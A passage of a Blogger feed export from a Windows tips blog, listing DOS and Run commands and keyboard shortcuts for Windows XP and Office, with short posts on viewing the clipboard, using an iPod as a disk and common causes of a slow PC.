/&gt;TYPE Display the contents of a file. &lt;br /&gt;UNDELETE Undelete a file that has been deleted. &lt;br /&gt;UNFORMAT Unformat a hard disk drive. &lt;br /&gt;UNLOCK Unlock a disk drive. &lt;br /&gt;VER Display the version information. &lt;br /&gt;VERIFY Enables or disables the feature to determine if files have been written properly. &lt;br /&gt;VOL Displays the volume information about the designated drive. &lt;br /&gt;XCOPY Copy multiple files, directories, and/or drives from one location to another. &lt;br /&gt;TRUENAME When placed before a file, will display the whole directory in which it exists &lt;br /&gt;TASKKILL It allows you to kill those unneeded or locked up applications&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size: large;"&gt;Run Commands To Access The Control Panel&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Add/Remove Programs control appwiz.cpl &lt;br /&gt;Date/Time Properties control timedate.cpl &lt;br /&gt;Display Properties control desk.cpl &lt;br /&gt;FindFast control findfast.cpl &lt;br /&gt;Fonts Folder control fonts &lt;br /&gt;Internet Properties control inetcpl.cpl &lt;br /&gt;Keyboard Properties control main.cpl keyboard &lt;br /&gt;Mouse Properties control main.cpl &lt;br /&gt;Multimedia Properties control mmsys.cpl &lt;br /&gt;Network Properties control netcpl.cpl &lt;br /&gt;Password Properties control password.cpl &lt;br /&gt;Printers Folder control printers &lt;br /&gt;Sound Properties control mmsys.cpl sounds &lt;br /&gt;System Properties control sysdm.cp&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size: large;"&gt;Run Commands:&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size: large;"&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;compmgmt.msc - Computer management &lt;br /&gt;devmgmt.msc - Device manager &lt;br /&gt;diskmgmt.msc - Disk management &lt;br /&gt;dfrg.msc - Disk defrag &lt;br /&gt;eventvwr.msc - Event viewer &lt;br /&gt;fsmgmt.msc - Shared folders &lt;br /&gt;gpedit.msc - Group policies &lt;br /&gt;lusrmgr.msc - Local users and groups &lt;br /&gt;perfmon.msc - Performance monitor &lt;br /&gt;rsop.msc - Resultant set of policies &lt;br /&gt;secpol.msc - Local security settings &lt;br /&gt;services.msc - Various Services &lt;br /&gt;msconfig - System Configuration Utility &lt;br /&gt;regedit - Registry Editor &lt;br /&gt;msinfo32 _ System Information &lt;br /&gt;sysedit _ System Edit &lt;br /&gt;win.ini _ windows loading information(also system.ini) &lt;br /&gt;winver _ Shows current version of windows &lt;br /&gt;mailto: _ Opens default email client &lt;br /&gt;command _ Opens command prompt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size: large;"&gt;Windows XP Shortcuts:&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size: large;"&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;ALT+- (ALT+hyphen) Displays the Multiple Document Interface (MDI) child window's System menu &lt;br /&gt;ALT+ENTER View properties for the selected item &lt;br /&gt;ALT+ESC Cycle through items in the order they were opened &lt;br /&gt;ALT+F4 Close the active item, or quit the active program &lt;br /&gt;ALT+SPACEBAR Display the System menu for the active window &lt;br /&gt;ALT+TAB Switch between open items &lt;br /&gt;ALT+Underlined letter Display the corresponding menu &lt;br /&gt;BACKSPACE View the folder one level up in My Computer or Windows Explorer &lt;br /&gt;CTRL+A Select all &lt;br /&gt;CTRL+B Bold &lt;br /&gt;CTRL+C Copy &lt;br /&gt;CTRL+I Italics &lt;br /&gt;CTRL+O Open an item &lt;br /&gt;CTRL+U Underline &lt;br /&gt;CTRL+V Paste &lt;br /&gt;CTRL+X Cut &lt;br /&gt;CTRL+Z Undo &lt;br /&gt;CTRL+F4 Close the active document &lt;br /&gt;CTRL while dragging Copy selected item &lt;br /&gt;CTRL+SHIFT while dragging Create shortcut to selected iteM &lt;br /&gt;CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word &lt;br /&gt;CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word &lt;br /&gt;CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph &lt;br /&gt;CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph &lt;br /&gt;SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin &lt;br /&gt;ESC Cancel the current task &lt;br /&gt;F1 Displays Help &lt;br /&gt;F2 Rename selected item &lt;br /&gt;F3 Search for a file or folder &lt;br /&gt;F4 Display the Address bar list in My Computer or Windows Explorer &lt;br /&gt;F5 Refresh the active window &lt;br /&gt;F6 Cycle through screen elements in a window or on the desktop &lt;br /&gt;F10 Activate the menu bar in the active program &lt;br /&gt;SHIFT+F10 Display the shortcut menu for the selected item &lt;br /&gt;CTRL+ESC Display the Start menu &lt;br /&gt;SHIFT+CTRL+ESC Launches Task Manager &lt;br /&gt;SHIFT when you insert a CD Prevent the CD from automatically playing &lt;br /&gt;WIN Display or hide the Start menu &lt;br /&gt;WIN+BREAK Display the System Properties dialog box &lt;br /&gt;WIN+D Minimizes all Windows and shows the Desktop &lt;br /&gt;WIN+E Open Windows Explorer &lt;br /&gt;WIN+F Search for a file or folder &lt;br /&gt;WIN+F+CTRL Search for computers &lt;br /&gt;WIN+L Locks the desktop &lt;br /&gt;WIN+M Minimize or restore all windows &lt;br /&gt;WIN+R Open the Run dialog box &lt;br /&gt;WIN+TAB Switch between open items&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size: large;"&gt;Windows Explorer Shortcuts:&lt;/span&gt;&lt;/strong&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ALT+SPACEBAR - Display the current window’s system menu &lt;br /&gt;SHIFT+F10 - Display the item's context menu &lt;br /&gt;CTRL+ESC - Display the Start menu &lt;br /&gt;ALT+TAB - Switch to the window you last used &lt;br /&gt;ALT+F4 - Close the current window or quit &lt;br /&gt;CTRL+A - Select all items &lt;br /&gt;CTRL+X - Cut selected item(s) &lt;br /&gt;CTRL+C - Copy selected item(s) &lt;br /&gt;CTRL+V - Paste item(s) &lt;br /&gt;CTRL+Z - Undo last action &lt;br /&gt;CTRL+(+) - Automatically resize the columns in the right hand pane &lt;br /&gt;TAB - Move forward through options &lt;br /&gt;ALT+RIGHT ARROW - Move forward to a previous view &lt;br /&gt;ALT+LEFT ARROW - Move backward to a previous view &lt;br /&gt;SHIFT+DELETE - Delete an item immediately &lt;br /&gt;BACKSPACE - View the folder one level up &lt;br /&gt;ALT+ENTER - View an item’s properties &lt;br /&gt;F10 - Activate the menu bar in programs &lt;br /&gt;F6 - Switch between left and right panes &lt;br /&gt;F5 - Refresh window contents &lt;br /&gt;F3 - Display Find application&lt;br /&gt;F2 - Rename selected item&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size: large;"&gt;Internet Explorer Shortcuts:&lt;/span&gt;&lt;/strong&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CTRL+A - Select all items on the current page &lt;br /&gt;CTRL+D - Add the current page to your Favorites &lt;br /&gt;CTRL+E - Open the Search bar &lt;br /&gt;CTRL+F - Find on this page &lt;br /&gt;CTRL+H - Open the History bar &lt;br /&gt;CTRL+I - Open the Favorites bar &lt;br /&gt;CTRL+N - Open a new window &lt;br /&gt;CTRL+O - Go to a new location &lt;br /&gt;CTRL+P - Print the current page or active frame &lt;br /&gt;CTRL+S - Save the current page &lt;br /&gt;CTRL+W - Close current browser window &lt;br /&gt;CTRL+ENTER - Adds the http://www. (url) .com &lt;br /&gt;SHIFT+CLICK - Open link in new window &lt;br /&gt;BACKSPACE - Go to the previous page &lt;br /&gt;ALT+HOME - Go to your Home page &lt;br /&gt;HOME - Move to the beginning of a document &lt;br /&gt;TAB - Move forward through items on a page &lt;br /&gt;END - Move to the end of a document &lt;br /&gt;ESC - Stop downloading a page &lt;br /&gt;F11 - Toggle full-screen view &lt;br /&gt;F5 - Refresh the current page &lt;br /&gt;F4 - Display list of typed addresses &lt;br /&gt;F6 - Change Address bar and page focus &lt;br /&gt;ALT+RIGHT ARROW - Go to the next page &lt;br /&gt;SHIFT+CTRL+TAB - Move back between frames &lt;br /&gt;SHIFT+F10 - Display a shortcut menu for a link &lt;br /&gt;SHIFT+TAB - Move back through the items on a page &lt;br /&gt;CTRL+TAB - Move forward between frames &lt;br /&gt;CTRL+C - Copy selected items to the clipboard &lt;br /&gt;CTRL+V - Insert contents of the clipboard &lt;br /&gt;ENTER - Activate a selected link &lt;br /&gt;HOME - Move to the beginning of a document &lt;br /&gt;END - Move to the end of a document&lt;br /&gt;F1 - Display Internet Explorer Help&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size: large;"&gt;Accessibility Shortcuts&lt;/span&gt;&lt;/strong&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Tap SHIFT 5 times - Toggles StickyKeys on and off. &lt;br /&gt;Press down and hold the right SHIFT key for 8 seconds - Toggles FilterKeys on and off. &lt;br /&gt;Press down and hold the NUM LOCK key for 5 seconds - Toggles ToggleKeys on and off. &lt;br /&gt;Left ALT+left SHIFT+NUM LOCK - Toggles MouseKeys on and off. &lt;br /&gt;Left ALT+left SHIFT+PRINT SCREEN - Toggles High Contrast on and off.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size: large;"&gt;Easy move through Powerpoint&lt;/span&gt;&lt;/strong&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Apply subscript formatting - CTRL+EQUAL SIGN (=) &lt;br /&gt;Apply superscript formatting - CTRL+PLUS SIGN (+) &lt;br /&gt;Bold - CTRL+B &lt;br /&gt;Capitalize - SHIFT+F3 &lt;br /&gt;Copy - CTRL+C &lt;br /&gt;Delete a word - CTRL+BACKSPACE &lt;br /&gt;Demote a paragraph - ALT+SHIFT+RIGHT ARROW &lt;br /&gt;Find - CTRL+F &lt;br /&gt;Insert a hyperlink - CTRL+K &lt;br /&gt;Insert a new slide - CTRL+M &lt;br /&gt;Italicize - CTRL+I &lt;br /&gt;Make a duplicate of the current slide - CTRL+D &lt;br /&gt;Open - CTRL+O &lt;br /&gt;Open the Font dialog box - CTRL+T &lt;br /&gt;Paste - CTRL+V &lt;br /&gt;Print - CTRL+P &lt;br /&gt;Promote a paragraph - ALT+SHIFT+LEFT ARROW &lt;br /&gt;Repeat your last action - F4 or CTRL+Y &lt;br /&gt;Save - CTRL+S &lt;br /&gt;Select all - CTRL+A &lt;br /&gt;Start a slide show - F5 &lt;br /&gt;Switch to the next pane (clockwise) - F6 &lt;br /&gt;Switch to the previous pane - SHIFT+F6 &lt;br /&gt;Undo - CTRL+Z &lt;br /&gt;View guides - CTRL+G&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size: large;"&gt;Excel Time saving Shortcuts&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Move to next cell in row - Tab &lt;br /&gt;Move to previous cell in row - Shift + Tab &lt;br /&gt;Up one screen - Page Up &lt;br /&gt;Down one screen - Page Down &lt;br /&gt;Move to next worksheet - Ctrl + Page Down &lt;br /&gt;Move to previous worksheet - Ctrl + Page Up &lt;br /&gt;Go to first cell in data region - Ctrl + Home &lt;br /&gt;Go to last cell in data region - Ctrl + End &lt;br /&gt;Bold toggle for selection - Ctrl + B &lt;br /&gt;Italic toggle for selection - Ctrl + I &lt;br /&gt;Underline toggle for selection - Ctrl + U &lt;br /&gt;Strikethrough for selection - Ctrl + 5 &lt;br /&gt;Change the font - Ctrl + Shift + F &lt;br /&gt;Change the font size - Ctrl + Shift + P &lt;br /&gt;Apply outline borders - Ctrl + Shift + 7 &lt;br /&gt;Remove all borders - Ctrl + Shift + Underline &lt;br /&gt;Wrap text in same cell - Alt + Enter &lt;br /&gt;Format cells - Ctrl + 1 &lt;br /&gt;Select font - Ctrl + Shift + F &lt;br /&gt;Select point size - Ctrl + Shift + P &lt;br /&gt;Format as currency - Ctrl + Shift + 4 &lt;br /&gt;Format as general - Ctrl + Shift + # (hash sign) &lt;br /&gt;Format as percentage - Ctrl + Shift + 5 &lt;br /&gt;Format as number - Ctrl + Shift + 1 &lt;br /&gt;Autosum a range of cells - Alt + Equals Sign &lt;br /&gt;Insert the date - Ctrl + ; (semi-colon) &lt;br /&gt;Insert the time - Ctrl + Shift + ; (semi-colon) &lt;br /&gt;Insert columns/rows - Ctrl + Shift + + (plus sign) &lt;br /&gt;Insert a new worksheet - Shift + F11 &lt;br /&gt;Read Monitor Cell One - Alt + Shift + 1 &lt;br /&gt;Read Monitor Cell Two - Alt + Shift + 2 &lt;br /&gt;Read Monitor Cell Three - Alt + Shift + 3 &lt;br /&gt;Read Monitor Cell Four - Alt + Shift + 4 &lt;br /&gt;List Visible Cells With Data - Ctrl + Shift + D &lt;br /&gt;Lists Data In Current Column - Ctrl + Shift + C &lt;br /&gt;List Data In Current Row - Ctrl + Shift + R &lt;br /&gt;Select Hyperlink - Ctrl + Shift + H &lt;br /&gt;Move To Worksheet Listbox - Ctrl + Shift + S &lt;br /&gt;Move To Monitor Cell - Ctrl + Shift + M &lt;br /&gt;Select Worksheet Objects - Ctrl + Shift + O &lt;br /&gt;List Cells At Page Breaks - Ctrl + Shift + B &lt;br /&gt;Options Listbox - Insert + V&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;strong&gt;Microsoft Office Keyboard Shortcut Keys&lt;/strong&gt;&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;All Caps - CTRL+SHIFT+A &lt;br /&gt;Annotation - ALT+CTRL+M &lt;br /&gt;Auto Format - ALT+CTRL+K &lt;br /&gt;Auto Text - F3 or ALT+CTRL+V &lt;br /&gt;Bold - CTRL+B or CTRL+SHIFT+B &lt;br /&gt;Bookmark - CTRL+SHIFT+F5 &lt;br /&gt;Copy - CTRL+C or CTRL+INSERT &lt;br /&gt;Copy Format - CTRL+SHIFT+C &lt;br /&gt;Copy Text - SHIFT+F2 &lt;br /&gt;Create Auto Text - ALT+F3 &lt;br /&gt;Date Field - ALT+SHIFT+D &lt;br /&gt;Delete Back Word - CTRL+BACKSPACE &lt;br /&gt;Delete Word - CTRL+DELETE &lt;br /&gt;Dictionary - ALT+SHIFT+F7 &lt;br /&gt;Do Field Click - ALT+SHIFT+F9 &lt;br /&gt;Doc Maximize - CTRL+F10 &lt;br /&gt;Doc Move - CTRL+F7 &lt;br /&gt;Doc Restore - CTRL+F5 &lt;br /&gt;Doc Size - CTRL+F8 &lt;br /&gt;Grow Font - CTRL+SHIFT+. &lt;br /&gt;Grow Font One Point - CTRL+]Hanging Indent - CTRL+T &lt;br /&gt;Header Footer Link - ALT+SHIFT+R &lt;br /&gt;Help - F1 &lt;br /&gt;Hidden - CTRL+SHIFT+H &lt;br /&gt;Hyperlink - CTRL+K &lt;br /&gt;Indent - CTRL+M &lt;br /&gt;Italic - CTRL+I or CTRL+SHIFT+I &lt;br /&gt;Justify Para - CTRL+J &lt;br /&gt;Left Para - CTRL+L &lt;br /&gt;Line Up Extend - SHIFT+UP &lt;br /&gt;List Num Field - ALT+CTRL+L &lt;br /&gt;Outline - ALT+CTRL+O &lt;br /&gt;Outline Collapse - ALT+SHIFT+- or ALT+SHIFT+NUM - &lt;br /&gt;Outline Demote - ALT+SHIFT+RIGHT &lt;br /&gt;Outline Expand - ALT+SHIFT+= &lt;br /&gt;Outline Expand - ALT+SHIFT+NUM + &lt;br /&gt;Outline Move Down - ALT+SHIFT+DOWN &lt;br /&gt;Outline Move Up - ALT+SHIFT+UP &lt;br /&gt;Outline Promote - ALT+SHIFT+LEFT &lt;br /&gt;Outline Show First Line - ALT+SHIFT+L &lt;br /&gt;Lock Fields - CTRL+3 or CTRL+F11 &lt;br /&gt;Web Go Back - ALT+LEFT &lt;br /&gt;Web Go Forward - ALT+RIGHT &lt;br /&gt;Word Left - CTRL+LEFT &lt;br /&gt;Word Left Extend - CTRL+SHIFT+LEFT&lt;br /&gt;Word Right - CTRL+RIGHT&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-6604781968733672388?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/6604781968733672388/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/all-windows-shortcuts.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6604781968733672388'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6604781968733672388'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/all-windows-shortcuts.html' title='All windows shortcuts'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1072554044835422144</id><published>2010-03-06T22:44:00.000-08:00</published><updated>2010-03-06T22:44:54.336-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>How to View Windows Clipboard Contents Easily in Windows</title><content type='html'>Sometimes you may wonder what is inside a clipboard before you decide to overwrite it with something else or start pasting it into document. Instead of viewing the content by opening up notepad or word document and paste it, there is a quick way that enables you to know the clipboard content with just a simple click.&lt;br /&gt;&lt;br /&gt;To display the clipboard content, user can do it by running clipbrd.exe and it will show you the clipboard content once it is launched. Clipbrd.exe comes together with Windows XP and it is located under C:\WINDOWS\system32. In order to access this utility in faster way, you can create a shortcut and put it in your desktop. Follow below steps to create the shortcut for this utility:&lt;br /&gt;1) Right click on the empty area on desktop, then select New-&gt;Shortcut.&lt;br /&gt;2) The ‘Create Shortcut window’ will pop up, type: %windir%\System32\clipbrd.exe and click Next button.&lt;br /&gt;3) Type a name for this shortcut as you like, for example: Clipbrd.exe then click Finish button to create the shortcut on your desktop.&lt;br /&gt;To view the content of your clipboard, just double click this shortcut and it will display the clipboard content immediately. For windows Vista, this utility is not part of windows Vista package. To enable this feature, you can copy clipbrd.exe from windows XP into C:\Windows\System32 in Vista, then create a shortcut on desktop to access it directly.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1072554044835422144?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1072554044835422144/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/how-to-view-windows-clipboard-contents.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1072554044835422144'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1072554044835422144'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/how-to-view-windows-clipboard-contents.html' title='How to View Windows Clipboard Contents Easily in Windows'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1854501534866877529</id><published>2010-03-06T22:18:00.000-08:00</published><updated>2010-03-06T22:18:25.556-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><title type='text'>How to use Your iPod as a Hard Disk</title><content type='html'>How to use Your iPod as a Hard Disk To use your iPod as a drive, hard drive or flash drive, depends on your iPod, to store and transfer data files on check this steps below. &lt;br /&gt;&lt;br /&gt;To put music files on your iPod, use iTunes. Keep in mind that you can't see the songs that iTunes copies to your iPod in the "Finder" or "My Computer". &lt;br /&gt;&lt;br /&gt;Using your iPod as a drive: &lt;br /&gt;&lt;br /&gt;1. Connect your iPod to a computer.&lt;br /&gt;2. Open iTunes.(if it doesn't open itself)&lt;br /&gt;3. Click the iPod icon in the Source pane.&lt;br /&gt;4. Click the Summary tab.&lt;br /&gt;5. For most iPod models (excluding iPod shuffle): Select "Enable disk use" or "Manually manage songs and playlists". Either of them will allow you to use iPod as a drive. If you choose "Manually manage songs and playlists", iTunes won't automatically update iPod with the iTunes library. If you want iTunes to automatically update your iPod, choose "Enable disk use" .&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;For iPod shuffle: Select the "Enable disk use" checkbox and set the Storage Allocation slider to indicate the space you want to be used by audio files and the space you want to be used for data files.&lt;br /&gt;&lt;br /&gt;6. The iPod disk icon appears on the desktop and in Finder windows, and in My Computer in Windows. Double-click the icon and drag files to or from iPod's window to copy them.&lt;br /&gt;&lt;br /&gt;7. Make sure to eject iPod before disconnecting it from your computer. The iPod display will say "Do Not Disconnect when disk use is enabled" so you won't forget.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Copy songs from iPod to Computer&lt;br /&gt;&lt;br /&gt;With default settings, iTunes automatically copies the media in your library to your iPod. When you use your iPod as a hard disk, you can't see the media iTunes copies to your iPod in the Finder or My Computer. Using the Finder or My Computer, you can't copy these media files from your iPod back to iTunes or to any other computer.&lt;br /&gt;&lt;br /&gt;The synchronization between your iPod and your computer is one way: from iTunes to iPod. The exception is the transfer Purchases feature, which allows you to restore purchased iTunes content to your computer from your iPod.&lt;br /&gt;&lt;br /&gt;If you've erased the iTunes library on your computer, there's no way to use the Finder or My Computer to copy the media from your iPod to rebuild the library on your computer. One way is to encode the songs from your CD again, then sync your new library with iPod. If you bought content from the iTunes Store and didn't back them up, you won't be able to download them again. You'll have to buy new copies.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Tips: If you plan to connect iPod to another computer, make sure not to sync it with the iTunes library on the other computer. This will only happen if you selected the Enable Disk Use option instead of manually managing music.&lt;br /&gt;&lt;br /&gt;If you use your iPod as a disk with a Windows PC, keep in mind that the FAT32 file system can only accommodate files that are smaller than 4 gigabytes. No matter how much free space there is on your iPod, you can't copy files that are larger than that.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1854501534866877529?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1854501534866877529/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/how-to-use-your-ipod-as-hard-disk.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1854501534866877529'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1854501534866877529'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/how-to-use-your-ipod-as-hard-disk.html' title='How to use Your iPod as a Hard Disk'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-4834831436577844167</id><published>2010-03-06T22:13:00.001-08:00</published><updated>2010-03-06T22:13:53.666-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Top 10 Causes of a Slow or Freezing PC</title><content type='html'>1. System Start-up packed with too many applications (Start-up overload)&lt;br /&gt;&lt;br /&gt;Over time, as you add more and more programs to your computer, many of these applications automatically add themselves to your Windows Start-up folder. Additionally, these applications can add themselves quietly to a hidden area of your Windows Start-up system (accessed via the MSCONFIG run command). In extreme cases your PC will appear completely frozen.&lt;br /&gt;&lt;br /&gt;Limiting the number of applications loading themselves at start-up can speed boot times considerably and increase overall system performance.&lt;br /&gt;2. Spyware&lt;br /&gt;&lt;br /&gt;Malicious programs that stealthily embed themselves into your Windows Registry and core file system are the number two most common cause of a slow PC or poor PC performance. &lt;br /&gt;&lt;br /&gt;These applications are usually installed without your knowledge or consent during the installation of a "free" application you're trying out, or pushed out automatically in the background when you visit websites that engage in this practice without the user's knowledge.&lt;br /&gt;&lt;br /&gt;These spyware programs must be removed as soon as possible to return your PC to top running speed, and before they damage your file system.&lt;br /&gt;&lt;br /&gt;In some cases they can be removed by manually editing the Windows core file system and registry or by using an automatic spyware remover.&lt;br /&gt;3. Corrupted/Bloated Windows Registry&lt;br /&gt;&lt;br /&gt;The Windows Registry is the master control center for your operating system and applications it runs. Corruption or overload registry issues can cause all sorts of pc performance problems, including poor application startup times, slow Windows start-up, extremely slow shut down, inability to resume from computer sleep and more.&lt;br /&gt;&lt;br /&gt;Cleaning, compacting, and optimizing your Windows registry can go a long way to dramatically speeding up your computer's performance, start-up and shutdown speed.&lt;br /&gt;4. Badly Fragmented Hard Drive&lt;br /&gt;&lt;br /&gt;The sixth most common reason for a slow PC is hard drive and file system fragmentation. Over time, your computer's files can be scattered into bits and pieces located all over your hard drive. This is called fragmentation. Windows has a built in tool to help you with hard drive defragmentation:&lt;br /&gt;o Open My Computer,&lt;br /&gt;o Right-click once on your C: Drive and go down to "Properties"&lt;br /&gt;o Select the "Tools" tab and choose the "Defragment Now" option and follow the step by step instructions.&lt;br /&gt;5. Poor Security Software that is stealing system resources&lt;br /&gt;&lt;br /&gt;Unfortunately, a large number of security software programs and suites out there demand a huge portion of your system resources and memory. This can lead to sluggish performance from the rest of your PC while your security software is constantly scanning and monitoring your computer for threats. &lt;br /&gt;&lt;br /&gt;While threat detection is essential, some security vendors go overboard with their approach and drag your PC down with them. &lt;br /&gt;&lt;br /&gt;To see how much memory and system resources your security software is using, press and hold CTRL+ALT+DELETE and choose the task manager.&lt;br /&gt;&lt;br /&gt;Once the task manager is open look at the "processes" section to see how much of your system resources are being used by your security apps.&lt;br /&gt;6. Remnants of uninstalled programs&lt;br /&gt;&lt;br /&gt;Uninstalling an application either via the control panel or the application's start menu folder has been known to leave behind remnants of the uninstalled program. These remnants can slow down your computer while Windows tries to figure out what to do with them. Additionally, residue of old program stays behind in your system registry, clogging up your PC's core.&lt;br /&gt;&lt;br /&gt;Recommended: Remove old uninstall entries.&lt;br /&gt;7. Pagefile&lt;br /&gt;&lt;br /&gt;The Windows page file is a temporary area of memory that your computer uses to move files around while it processes functions. Basically, it's a buffer that your computer uses for wiggle room. If your Pagefile is too small, your operating system won't have enough room to move and you could end up with poor performance and error messages.&lt;br /&gt;&lt;br /&gt;To increase the size of your Pagefile:&lt;br /&gt;o Right-click on "My Computer" and go down to "Properties"&lt;br /&gt;o Click the "Advanced" tab&lt;br /&gt;o Click "Settings" under the "Performance" section&lt;br /&gt;o Click the "Advanced" button&lt;br /&gt;o Click "Change" under "Virtual Memory"&lt;br /&gt;8. Hard Drive getting full and too many internet temp and windows temp files&lt;br /&gt;&lt;br /&gt;If your hard drive has less than 10% free space, you will experience a dramatic slowdown in the performance of your PC. To improve this, free up some space by removing old documents you no longer use or programs that are no longer needed.&lt;br /&gt;&lt;br /&gt;Additionally, your Internet Explorer temp files folder can become jam-packed and lead to extraordinary launch times for Internet Explorer.&lt;br /&gt;9. Virus&lt;br /&gt;&lt;br /&gt;Closely related to Spyware, viruses can wreak havoc on your system's performance and severely limit your PC's ability to do what you ask it to. &lt;br /&gt;&lt;br /&gt;Typically, viruses get onto your computer via infected email or instant messages, although they can also be installed via applications or files that you download from file-sharing networks and other non-trusted web sites.&lt;br /&gt;&lt;br /&gt;Manual removal of viruses is very difficult and rarely successful,&lt;br /&gt;10. Hardware Problems&lt;br /&gt;&lt;br /&gt;The fourth most common cause of a slow or freezing computer is gradually dying internal hardware components. These can often show up in the form of slow boot and shut down, as well as poor program launches riddled with errors.&lt;br /&gt;&lt;br /&gt;There are very few hardware diagnostic utilities out there, so we recommend careful removal of any newly installed pc components to see if they are causing a problem or incompatibility. Other than that, taking your PC to a certified, trusted hardware repair shop is usually a good idea.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-4834831436577844167?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/4834831436577844167/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/top-10-causes-of-slow-or-freezing-pc.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4834831436577844167'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4834831436577844167'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/top-10-causes-of-slow-or-freezing-pc.html' title='Top 10 Causes of a Slow or Freezing 